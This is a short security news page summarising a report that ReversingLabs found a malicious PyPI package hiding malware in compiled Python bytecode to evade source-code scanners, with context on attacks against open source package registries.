Security News > 2023 > June > This malicious PyPI package mixed source and compiled code to dodge detection

This malicious PyPI package mixed source and compiled code to dodge detection
2023-06-02 06:24

ReversingLabs detected a Python package in April that mixed malware with compiled code as a way to evade detection by security tools that only check source code files and not compiled output.

It's a worrying threat given the increasing number of attacks not only on PyPI but other open source code repositories like GitHub, NPM, and RubyGems.

Miscreants are trying to slip malicious code into packages via these platforms in hopes that developers will grab one and inadvertently put the bad code into their software.

Unlike source code written by humans, bytecode is converted code that can be interpreted easily by a machine but is difficult to be understood by humans.

Most security tools also don't typically run source code analysis when inspecting packages, which is "Why malware hidden inside the Python compiled byte code could slip under the radar of the traditional security solutions" according to Zanki.

Last month, PyPI - which has more than 455,000 Python code repositories - saw so many attempts to create malicious accounts and code libraries that it stopped allowing new users and projects in for a while.


News URL

https://go.theregister.com/feed/www.theregister.com/2023/06/02/novel_pypi_attack_reversinglabs/

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
Pypi 15 0 0 1 15 16